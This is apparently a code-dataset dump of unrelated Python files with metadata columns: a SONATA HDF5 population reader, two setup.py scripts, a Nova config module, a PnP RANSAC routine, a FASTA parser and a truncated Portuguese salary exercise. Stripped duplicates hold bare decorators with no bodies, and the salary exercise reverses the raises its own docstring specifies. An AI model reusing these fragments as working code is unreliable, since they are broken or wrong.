# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
import h5py
import pandas as pd
import numpy as np
from . import utils
from .population import NodePopulation, EdgePopulation
from .types_table import NodeTypesTable, EdgeTypesTable
class FileRoot(object):
"""Base class for both /nodes and /edges root group in h5 file"""
def __init__(self, root_name, h5_files, h5_mode, csv_files):
"""
:param root_name: should either be 'nodes' or 'edges'
:param h5_files: file (or list of files) containing nodes/edges
:param h5_mode: currently only supporting 'r' mode in h5py
:param csv_files: file (or list of files) containing node/edge types
"""
self._root_name = root_name
self._h5_handles = [utils.load_h5(f, h5_mode) for f in utils.listify(h5_files)]
self._csv_handles = [(f, utils.load_csv(f)) for f in utils.listify(csv_files)]
# merge and create a table of the types table(s)
self._types_table = None
self._build_types_table()
# population_name->h5py.Group table (won't instantiate the population)
self._populations_groups = {}
self._store_groups()
# A map between population_name -> Population object. Population objects aren't created until called, in the
# case user wants to split populations among MPI nodes (instantiation will create node/edge indicies and other
# overhead).
self._populations_cache = {}
self.check_format()
@property
@property
@property
@property
@types_table.setter
def _store_groups(self):
"""Create a map between group population to their h5py.Group handle"""
for h5handle in self._h5_handles:
assert(self.root_name in h5handle.keys())
for pop_name, pop_group in h5handle[self._root_name].items():
if pop_name in self._populations_groups:
raise Exception('Multiple {} populations with name {}.'.format(self._root_name, pop_name))
self._populations_groups[pop_name] = pop_group
def get_population(self, population_name, default=None):
"""Return a population group object based on population's name"""
if population_name in self:
return self[population_name]
else:
# need this for EdgeRoot.get_populations
return default
| 45.880795 | 120 | 0.670612 | # Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
import h5py
import pandas as pd
import numpy as np
from . import utils
from .population import NodePopulation, EdgePopulation
from .types_table import NodeTypesTable, EdgeTypesTable
class FileRoot(object):
"""Base class for both /nodes and /edges root group in h5 file"""
def __init__(self, root_name, h5_files, h5_mode, csv_files):
"""
:param root_name: should either be 'nodes' or 'edges'
:param h5_files: file (or list of files) containing nodes/edges
:param h5_mode: currently only supporting 'r' mode in h5py
:param csv_files: file (or list of files) containing node/edge types
"""
self._root_name = root_name
self._h5_handles = [utils.load_h5(f, h5_mode) for f in utils.listify(h5_files)]
self._csv_handles = [(f, utils.load_csv(f)) for f in utils.listify(csv_files)]
# merge and create a table of the types table(s)
self._types_table = None
self._build_types_table()
# population_name->h5py.Group table (won't instantiate the population)
self._populations_groups = {}
self._store_groups()
# A map between population_name -> Population object. Population objects aren't created until called, in the
# case user wants to split populations among MPI nodes (instantiation will create node/edge indicies and other
# overhead).
self._populations_cache = {}
self.check_format()
@property
def root_name(self):
return self._root_name
@property
def population_names(self):
return list(self._populations_groups.keys())
@property
def populations(self):
return [self[name] for name in self.population_names]
@property
def types_table(self):
return self._types_table
@types_table.setter
def types_table(self, types_table):
self._types_table = types_table
def _build_types_table(self):
raise NotImplementedError
def _store_groups(self):
"""Create a map between group population to their h5py.Group handle"""
for h5handle in self._h5_handles:
assert(self.root_name in h5handle.keys())
for pop_name, pop_group in h5handle[self._root_name].items():
if pop_name in self._populations_groups:
raise Exception('Multiple {} populations with name {}.'.format(self._root_name, pop_name))
self._populations_groups[pop_name] = pop_group
def _build_population(self, pop_name, pop_group):
raise NotImplementedError
def get_population(self, population_name, default=None):
"""Return a population group object based on population's name"""
if population_name in self:
return self[population_name]
else:
# need this for EdgeRoot.get_populations
return default
def check_format(self):
if len(self._h5_handles) == 0:
raise Exception('No {} hdf5 files specified.'.format(self.root_name))
if len(self._csv_handles) == 0:
raise Exception('No {} types csv files specified.'.format(self.root_name))
def __contains__(self, population_name):
# TODO: Add condition if user passes in io.Population object
return population_name in self.population_names
def __getitem__(self, population_name):
if population_name not in self:
raise Exception('{} does not contain a population with name {}.'.format(self.root_name, population_name))
if population_name in self._populations_cache:
return self._populations_cache[population_name]
else:
h5_grp = self._populations_groups[population_name]
pop_obj = self._build_population(population_name, h5_grp)
self._populations_cache[population_name] = pop_obj
return pop_obj
class NodesRoot(FileRoot):
def __init__(self, nodes, node_types, mode='r', gid_table=None):
super(NodesRoot, self).__init__('nodes', h5_files=nodes, h5_mode=mode, csv_files=node_types)
# load the gid <--> (node_id, population) map if specified.
self._gid_table = gid_table
self._gid_table_groupby = {}
self._has_gids = False
# TODO: Should we allow gid-table to be built into '/nodes' h5 groups, or must it always be a separat file?
if gid_table is not None:
self.set_gid_table(gid_table)
@property
def has_gids(self):
return self._has_gids
@property
def node_types_table(self):
return self.types_table
def set_gid_table(self, gid_table, force=False):
"""Adds a map from a gids <--> (node_id, population) based on specification.
:param gid_table: An h5 file/group containing map specifications
:param force: Set to true to have it overwrite any exsiting gid table (default False)
"""
assert(gid_table is not None)
if self.has_gids and not force:
raise Exception('gid table already exists (use force=True to overwrite)')
self._gid_table = utils.load_h5(gid_table, 'r')
# TODO: validate that the correct columns/dtypes exists.
gid_df = pd.DataFrame()
gid_df['gid'] = pd.Series(data=self._gid_table['gid'], dtype=self._gid_table['gid'].dtype)
gid_df['node_id'] = pd.Series(data=self._gid_table['node_id'], dtype=self._gid_table['node_id'].dtype)
gid_df['population'] = pd.Series(data=self._gid_table['population'])
population_names_ds = self._gid_table['population_names']
for pop_id, subset in gid_df.groupby(by='population'):
pop_name = population_names_ds[pop_id]
self._gid_table_groupby[pop_name] = subset
self._has_gids = True
def generate_gids(self, file_name, gids=None, force=False):
"""Creates a gid <--> (node_id, population) table based on sonnet specifications.
Generating gids will take some time and so not recommend to call this during the simulation. Instead save
the file to the disk and pass in h5 file during the simulation (using gid_table parameter). In fact if you're
worried about efficeny don't use this method.
:param file_name: Name of h5 file to save gid map to.
:param gids: rule/list of gids to use
:param force: set to true to overwrite existing gid map (default False).
"""
# TODO: This is very inefficent, fix (although not a priority as this function should be called sparingly)
# TODO: Allow users to pass in a list/function to determine gids
# TODO: We should use an enumerated lookup table for population ds instead of storing strings
# TODO: Move this to a utils function rather than a File
if self.has_gids and not force:
raise Exception('Nodes already have a gid table. Use force=True to overwrite existing gids.')
dir_name = os.path.dirname(os.path.abspath(file_name))
if not os.path.exists(dir_name):
os.makedirs(dir_name)
with h5py.File(file_name, 'w') as h5:
# TODO: should we use mode 'x', or give an option to overwrite existing files
n_nodes = 0
ascii_len = 0 # store max population name for h5 fixed length strings
# Find population names and the total size of every population
for node_pop in self.populations:
n_nodes += len(node_pop)
name_nchars = len(node_pop.name)
ascii_len = ascii_len if ascii_len >= name_nchars else name_nchars
# node_id and gid datasets should just be unsigned integers
h5.create_dataset(name='gid', shape=(n_nodes,), dtype=np.uint64)
h5.create_dataset(name='node_id', shape=(n_nodes,), dtype=np.uint64)
# TODO: determine population precisions from num of populations
h5.create_dataset(name='population', shape=(n_nodes,), dtype=np.uint16)
# Create a lookup table for pop-name
pop_name_list = [pname for pname in self.population_names]
if utils.using_py3:
dt = h5py.special_dtype(vlen=str) # python 3
else:
dt = h5py.special_dtype(vlen=unicode) # python 2
h5.create_dataset(name='population_names', shape=(len(pop_name_list),), dtype=dt)
# No clue why but just passing in the data during create_dataset doesn't work h5py
for i, n in enumerate(pop_name_list):
h5['population_names'][i] = n
# write each (gid, node_id, population)
indx = 0
for node_pop in self.populations:
# TODO: Block write if special gid generator isn't being used
# TODO: Block write populations at least
pop_name = node_pop.name # encode('ascii', 'ignore')
pop_id = pop_name_list.index(pop_name)
for node in node_pop:
h5['node_id'][indx] = node.node_id
h5['population'][indx] = pop_id
h5['gid'][indx] = indx
indx += 1
# pass gid table to current nodes
self.set_gid_table(h5)
def _build_types_table(self):
self.types_table = NodeTypesTable()
for _, csvhandle in self._csv_handles:
self.types_table.add_table(csvhandle)
def _build_population(self, pop_name, pop_group):
return NodePopulation(pop_name, pop_group, self.node_types_table)
def __getitem__(self, population_name):
# If their is a gids map then we must pass it into the population
pop_obj = super(NodesRoot, self).__getitem__(population_name)
if self.has_gids and (not pop_obj.has_gids) and (population_name in self._gid_table_groupby):
pop_obj.add_gids(self._gid_table_groupby[population_name])
return pop_obj
class EdgesRoot(FileRoot):
def __init__(self, edges, edge_types, mode='r'):
super(EdgesRoot, self).__init__(root_name='edges', h5_files=edges, h5_mode=mode, csv_files=edge_types)
@property
def edge_types_table(self):
return self.types_table
def get_populations(self, name=None, source=None, target=None):
"""Find all populations with matching criteria, either using the population name (which will return a list
of size 0 or 1) or based on the source/target population.
To return a list of all populations just use populations() method
:param name: (str) name of population
:param source: (str or NodePopulation) returns edges with nodes coming from matching source-population
:param target: (str or NodePopulation) returns edges with nodes coming from matching target-population
:return: A (potential empty) list of EdgePopulation objects filter by criteria.
"""
assert((name is not None) ^ (source is not None or target is not None))
if name is not None:
return [self[name]]
else:
# TODO: make sure groups aren't built unless they are a part of the results
selected_pops = self.population_names
if source is not None:
# filter out only edges with given source population
source = source.name if isinstance(source, NodePopulation) else source
selected_pops = [name for name in selected_pops
if EdgePopulation.get_source_population(self._populations_groups[name]) == source]
if target is not None:
# filter out by target population
target = target.name if isinstance(target, NodePopulation) else target
selected_pops = [name for name in selected_pops
if EdgePopulation.get_target_population(self._populations_groups[name]) == target]
return [self[name] for name in selected_pops]
def _build_types_table(self):
self.types_table = EdgeTypesTable()
for _, csvhandle in self._csv_handles:
self.edge_types_table.add_table(csvhandle)
def _build_population(self, pop_name, pop_group):
return EdgePopulation(pop_name, pop_group, self.edge_types_table)
| 2,885 | 6,760 | 311 |
27a41e0d544a5c6660bd427e332b412facc45223 | 2,615 | py | Python | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | [
"ZPL-2.1"
] | null | null | null | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | [
"ZPL-2.1"
] | null | null | null | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | [
"ZPL-2.1"
] | null | null | null | import os
from setuptools import setup
from setuptools import find_packages
NAME = 'CMFCore'
here = os.path.abspath(os.path.dirname(__file__))
package = os.path.join(here, 'Products', NAME)
_boundary = '\n' + ('-' * 60) + '\n\n'
README = _boundary.join([
_package_doc('README.txt'),
_package_doc('CHANGES.txt'),
])
setup(name='Products.%s' % NAME,
version='2.4.0b5.dev0',
description='Zope Content Management Framework core components',
long_description=README,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Plone",
"Framework :: Zope :: 4",
"Intended Audience :: Developers",
"License :: OSI Approved :: Zope Public License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Software Development :: Libraries :: Application Frameworks", # noqa
],
keywords='web application server zope cmf',
author="Zope Foundation and Contributors",
author_email="zope-cmf@zope.org",
url="https://github.com/zopefoundation/Products.CMFCore",
license="ZPL 2.1",
packages=find_packages(),
include_package_data=True,
namespace_packages=['Products'],
zip_safe=False,
setup_requires=[
'eggtestinfo',
],
install_requires=[
'setuptools',
'Zope >= 4.0b4',
'docutils',
'five.localsitemanager',
'Products.BTreeFolder2',
'Products.GenericSetup >= 2.0b1',
'Products.MailHost >= 4.0',
'Products.PythonScripts',
'Products.StandardCacheManagers',
'Products.ZCTextIndex',
'six',
],
tests_require=[
'zope.testing >= 3.7.0',
'Products.StandardCacheManagers',
],
extras_require={
'test': ['Products.StandardCacheManagers'],
'zsql': ['Products.ZSQLMethods >= 3.0.0b1'],
},
test_loader='zope.testing.testrunner.eggsupport:SkipLayers',
test_suite='Products.%s' % NAME,
entry_points="""
[zope2.initialize]
Products.%s = Products.%s:initialize
[distutils.commands]
ftest = zope.testing.testrunner.eggsupport:ftest
""" % (NAME, NAME),
)
| 31.890244 | 89 | 0.587763 | import os
from setuptools import setup
from setuptools import find_packages
NAME = 'CMFCore'
here = os.path.abspath(os.path.dirname(__file__))
package = os.path.join(here, 'Products', NAME)
def _package_doc(name):
f = open(os.path.join(here, name))
return f.read()
_boundary = '\n' + ('-' * 60) + '\n\n'
README = _boundary.join([
_package_doc('README.txt'),
_package_doc('CHANGES.txt'),
])
setup(name='Products.%s' % NAME,
version='2.4.0b5.dev0',
description='Zope Content Management Framework core components',
long_description=README,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Plone",
"Framework :: Zope :: 4",
"Intended Audience :: Developers",
"License :: OSI Approved :: Zope Public License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Software Development :: Libraries :: Application Frameworks", # noqa
],
keywords='web application server zope cmf',
author="Zope Foundation and Contributors",
author_email="zope-cmf@zope.org",
url="https://github.com/zopefoundation/Products.CMFCore",
license="ZPL 2.1",
packages=find_packages(),
include_package_data=True,
namespace_packages=['Products'],
zip_safe=False,
setup_requires=[
'eggtestinfo',
],
install_requires=[
'setuptools',
'Zope >= 4.0b4',
'docutils',
'five.localsitemanager',
'Products.BTreeFolder2',
'Products.GenericSetup >= 2.0b1',
'Products.MailHost >= 4.0',
'Products.PythonScripts',
'Products.StandardCacheManagers',
'Products.ZCTextIndex',
'six',
],
tests_require=[
'zope.testing >= 3.7.0',
'Products.StandardCacheManagers',
],
extras_require={
'test': ['Products.StandardCacheManagers'],
'zsql': ['Products.ZSQLMethods >= 3.0.0b1'],
},
test_loader='zope.testing.testrunner.eggsupport:SkipLayers',
test_suite='Products.%s' % NAME,
entry_points="""
[zope2.initialize]
Products.%s = Products.%s:initialize
[distutils.commands]
ftest = zope.testing.testrunner.eggsupport:ftest
""" % (NAME, NAME),
)
| 61 | 0 | 23 |
8c2f2b0b29a89361362b8c63b5f23ed318d65a4a | 3,030 | py | Python | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | [
"Apache-2.0"
] | null | null | null | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | [
"Apache-2.0"
] | null | null | null | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | [
"Apache-2.0"
] | 1 | 2020-03-01T17:04:57.000Z | 2020-03-01T17:04:57.000Z | # Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
api_opts = [
cfg.ListOpt("extensions_blacklist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a list of all of the v2.1 API extensions to never load. However,
it will be removed in the near future, after which the all the functionality
that was previously in extensions will be part of the standard API, and thus
always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you do not
wish to load.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_whitelist
"""),
cfg.ListOpt("extensions_whitelist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This is a list of extensions. If it is empty, then *all* extensions except
those specified in the extensions_blacklist option will be loaded. If it is not
empty, then only those extensions in this list will be loaded, provided that
they are also not in the extensions_blacklist option. Once this deprecated
option is removed, after which the all the functionality that was previously in
extensions will be part of the standard API, and thus always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you wish to
load, or an empty list, which indicates that all extensions are to be run.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_blacklist
"""),
cfg.StrOpt("project_id_regex",
default=None,
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a string representing a regular expression (regex) that matches
the project_id as contained in URLs. If not set, it will match normal UUIDs
created by keystone.
* Possible values:
A string representing any legal regular expression
* Services that use this:
``nova-api``
* Related options:
None
"""),
]
api_opts_group = cfg.OptGroup(name="osapi_v21", title="API v2.1 Options")
| 28.317757 | 79 | 0.709571 | # Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
api_opts = [
cfg.ListOpt("extensions_blacklist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a list of all of the v2.1 API extensions to never load. However,
it will be removed in the near future, after which the all the functionality
that was previously in extensions will be part of the standard API, and thus
always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you do not
wish to load.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_whitelist
"""),
cfg.ListOpt("extensions_whitelist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This is a list of extensions. If it is empty, then *all* extensions except
those specified in the extensions_blacklist option will be loaded. If it is not
empty, then only those extensions in this list will be loaded, provided that
they are also not in the extensions_blacklist option. Once this deprecated
option is removed, after which the all the functionality that was previously in
extensions will be part of the standard API, and thus always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you wish to
load, or an empty list, which indicates that all extensions are to be run.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_blacklist
"""),
cfg.StrOpt("project_id_regex",
default=None,
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a string representing a regular expression (regex) that matches
the project_id as contained in URLs. If not set, it will match normal UUIDs
created by keystone.
* Possible values:
A string representing any legal regular expression
* Services that use this:
``nova-api``
* Related options:
None
"""),
]
api_opts_group = cfg.OptGroup(name="osapi_v21", title="API v2.1 Options")
def register_opts(conf):
conf.register_group(api_opts_group)
conf.register_opts(api_opts, api_opts_group)
def list_opts():
return {api_opts_group: api_opts}
| 125 | 0 | 46 |
bc50a54003ed4f378eba19789b209b5f23ec8ad4 | 1,813 | py | Python | SfM/Traditional/PnPRANSAC.py | akathpal/ComputerVision-CMSC733 | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | [
"MIT"
] | 1 | 2019-09-26T02:06:17.000Z | 2019-09-26T02:06:17.000Z | SfM/Traditional/PnPRANSAC.py | akathpal/UMD-CMSC733-ComputerVision | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | [
"MIT"
] | null | null | null | SfM/Traditional/PnPRANSAC.py | akathpal/UMD-CMSC733-ComputerVision | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | [
"MIT"
] | 1 | 2022-03-30T05:03:09.000Z | 2022-03-30T05:03:09.000Z | """Summary
"""
import numpy as np
import LinearPnP as LPnP
import random
from tqdm import tqdm
def proj3Dto2D(x3D, K, C, R):
"""Summary
Args:
x3D (TYPE): Description
K (TYPE): Description
C (TYPE): Description
R (TYPE): Description
Returns:
TYPE: Description
"""
C = C.reshape(-1, 1)
x3D = x3D.reshape(-1, 1)
# print("K", K.shape, R.shape, C.shape, x3D.shape)
P = np.dot(np.dot(K, R), np.hstack((np.identity(3), -C)))
X3D = np.vstack((x3D, 1))
# print("P",P.shape, X3D.shape)
u_rprj = (np.dot(P[0, :], X3D)).T / (np.dot(P[2, :], X3D)).T
v_rprj = (np.dot(P[1, :], X3D)).T / (np.dot(P[2, :], X3D)).T
X2D = np.hstack((u_rprj, v_rprj))
return X2D
def PnPRANSAC(X, x, K):
"""Summary
Args:
X (TYPE): Description
x (TYPE): Description
K (TYPE): Description
Returns:
TYPE: Description
"""
cnt = 0
M = x.shape[0]
threshold = 5 #6
x_ = LPnP.convertHomogeneouos(x)
Cnew = np.zeros((3, 1))
Rnew = np.identity(3)
for trails in tqdm(range(500)):
# random.randrange(0, len(corr_list))
random_idx = random.sample(range(M), 6)
C, R = LPnP.LinearPnP(X[random_idx][:], x[random_idx][:], K)
S = []
for j in range(M):
reprojection = proj3Dto2D(x_[j][:], K, C, R)
e = np.sqrt(
np.square((x_[j, 0]) - reprojection[0]) +
np.square((x_[j, 1] - reprojection[1])))
if e < threshold:
S.append(j)
countS = len(S)
if (cnt < countS):
cnt = countS
Rnew = R
Cnew = C
if (countS == M):
break
# print("Inliers = " + str(cnt) + "/" + str(M))
return Cnew, Rnew
| 24.173333 | 68 | 0.498621 | """Summary
"""
import numpy as np
import LinearPnP as LPnP
import random
from tqdm import tqdm
def proj3Dto2D(x3D, K, C, R):
"""Summary
Args:
x3D (TYPE): Description
K (TYPE): Description
C (TYPE): Description
R (TYPE): Description
Returns:
TYPE: Description
"""
C = C.reshape(-1, 1)
x3D = x3D.reshape(-1, 1)
# print("K", K.shape, R.shape, C.shape, x3D.shape)
P = np.dot(np.dot(K, R), np.hstack((np.identity(3), -C)))
X3D = np.vstack((x3D, 1))
# print("P",P.shape, X3D.shape)
u_rprj = (np.dot(P[0, :], X3D)).T / (np.dot(P[2, :], X3D)).T
v_rprj = (np.dot(P[1, :], X3D)).T / (np.dot(P[2, :], X3D)).T
X2D = np.hstack((u_rprj, v_rprj))
return X2D
def PnPRANSAC(X, x, K):
"""Summary
Args:
X (TYPE): Description
x (TYPE): Description
K (TYPE): Description
Returns:
TYPE: Description
"""
cnt = 0
M = x.shape[0]
threshold = 5 #6
x_ = LPnP.convertHomogeneouos(x)
Cnew = np.zeros((3, 1))
Rnew = np.identity(3)
for trails in tqdm(range(500)):
# random.randrange(0, len(corr_list))
random_idx = random.sample(range(M), 6)
C, R = LPnP.LinearPnP(X[random_idx][:], x[random_idx][:], K)
S = []
for j in range(M):
reprojection = proj3Dto2D(x_[j][:], K, C, R)
e = np.sqrt(
np.square((x_[j, 0]) - reprojection[0]) +
np.square((x_[j, 1] - reprojection[1])))
if e < threshold:
S.append(j)
countS = len(S)
if (cnt < countS):
cnt = countS
Rnew = R
Cnew = C
if (countS == M):
break
# print("Inliers = " + str(cnt) + "/" + str(M))
return Cnew, Rnew
| 0 | 0 | 0 |
91209b23eab8a5ab7f587d0930191fdd2e862962 | 965 | py | Python | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
def friendly(command_subclass):
"""
A decorator for classes subclassing one of the setuptools commands.
It modifies the run() method so that it prints a friendly greeting.
"""
orig_run = command_subclass.run
command_subclass.run = modified_run
return command_subclass
@friendly
setup(name='myPackage',
version='0.1',
description='My first python package',
author='Marcelo Santos',
author_email='email@domain.com',
url='https://github.com/mefsantos/branch-testing',
packages=['.', 'modules'],
# Extension('foo', ['src/foo1.c', 'src/foo2.c']),
cmdclass={
'install': CustomInstallCommand,
},
)
| 21.931818 | 71 | 0.699482 | #!/usr/bin/env python
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
def friendly(command_subclass):
"""
A decorator for classes subclassing one of the setuptools commands.
It modifies the run() method so that it prints a friendly greeting.
"""
orig_run = command_subclass.run
def modified_run(self):
print "Modified setup run"
orig_run(self)
command_subclass.run = modified_run
return command_subclass
@friendly
class CustomInstallCommand(install):
print "User instalation"
pass
setup(name='myPackage',
version='0.1',
description='My first python package',
author='Marcelo Santos',
author_email='email@domain.com',
url='https://github.com/mefsantos/branch-testing',
packages=['.', 'modules'],
# Extension('foo', ['src/foo1.c', 'src/foo2.c']),
cmdclass={
'install': CustomInstallCommand,
},
)
| 48 | 47 | 46 |
be4cbce6f0215362dc8c07de53a409e097b2847d | 102 | py | Python | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | [
"MIT"
] | null | null | null | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | [
"MIT"
] | null | null | null | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, 'staticsql')) | 25.5 | 80 | 0.764706 | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, 'staticsql')) | 0 | 0 | 0 |
abb474a9f34b3f34295c3057977ccfd213b24757 | 2,576 | py | Python | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | [
"CC0-1.0"
] | null | null | null | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | [
"CC0-1.0"
] | null | null | null | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | [
"CC0-1.0"
] | null | null | null |
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 2:
sys.exit("usage fasta_object fasta_path")
fasta_path = sys.argv[1]
if not os.path.exists(fasta_path):
sys.exit("No such file: {}".format(fasta_path))
fasta_parser = FastaParser(fasta_path)
for sequence in fasta_parser:
print "----------------"
print "{seqid} = {gc:.3%}".format(gc=sequence.gc_percent(),
seqid = sequence.id) | 32.2 | 74 | 0.53222 | class Sequence(object):
def __init__(self, id_, sequence, comment=''):
self.id = id_
self.comment = comment
self.sequence = sequence
def gc_percent(self):
seq = self.sequence.upper()
return float(seq.count('G') + seq.count('C')) / float(len(seq))
class FastaParser(object):
def __init__(self, fasta_path):
self.path = fasta_path
self._file = open(fasta_path)
self._current_id = ''
self._current_comment = ''
self._current_sequence = ''
def _parse_header(self, line):
"""
parse the header line and _current_id|comment|sequence attributes
:param line: the line of header in fasta format
:type line: string
"""
header = line.split()
self._current_id = header[0][1:]
self._current_comment = ' '.join(header[1:])
self._current_sequence = ''
def __iter__(self):
return self
def next(self):
"""
:return: at each call return a new :class:`Sequence` object
:raise: StopIteration
"""
for line in self._file:
if line.startswith('>'):
# a new sequence begin
if self._current_id != '':
new_seq = Sequence(self._current_id,
self._current_sequence,
comment=self._current_comment)
self._parse_header(line)
return new_seq
else:
self._parse_header(line)
else:
self._current_sequence += line.strip()
if not self._current_id and not self._current_sequence:
self._file.close()
raise StopIteration()
else:
new_seq = Sequence(self._current_id,
self._current_sequence,
comment=self._current_comment)
self._current_id = ''
self._current_sequence = ''
return new_seq
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 2:
sys.exit("usage fasta_object fasta_path")
fasta_path = sys.argv[1]
if not os.path.exists(fasta_path):
sys.exit("No such file: {}".format(fasta_path))
fasta_parser = FastaParser(fasta_path)
for sequence in fasta_parser:
print "----------------"
print "{seqid} = {gc:.3%}".format(gc=sequence.gc_percent(),
seqid = sequence.id) | 417 | 1,554 | 99 |
b9b417b80dc5364aedd894415852090ddedf5d18 | 568 | py | Python | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | [
"MIT"
] | null | null | null | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | [
"MIT"
] | null | null | null | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | [
"MIT"
] | null | null | null | """ Escreva um programa que pergunte o salário de um funcionário e calcule o valor do seu aumento.
Para salários superiores a R$1.250,00, calcule um aumento de 10%. Para os inferiores ou iguais, o aumento é de 15%."""
salario = float(input('Qual valor do seu salario R$ '))
if salario <= 1249.99:
aumento = (salario * 10)/ 100
print('Seu aumento foi de 10% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
else:
aumento = (salario * 15) /100
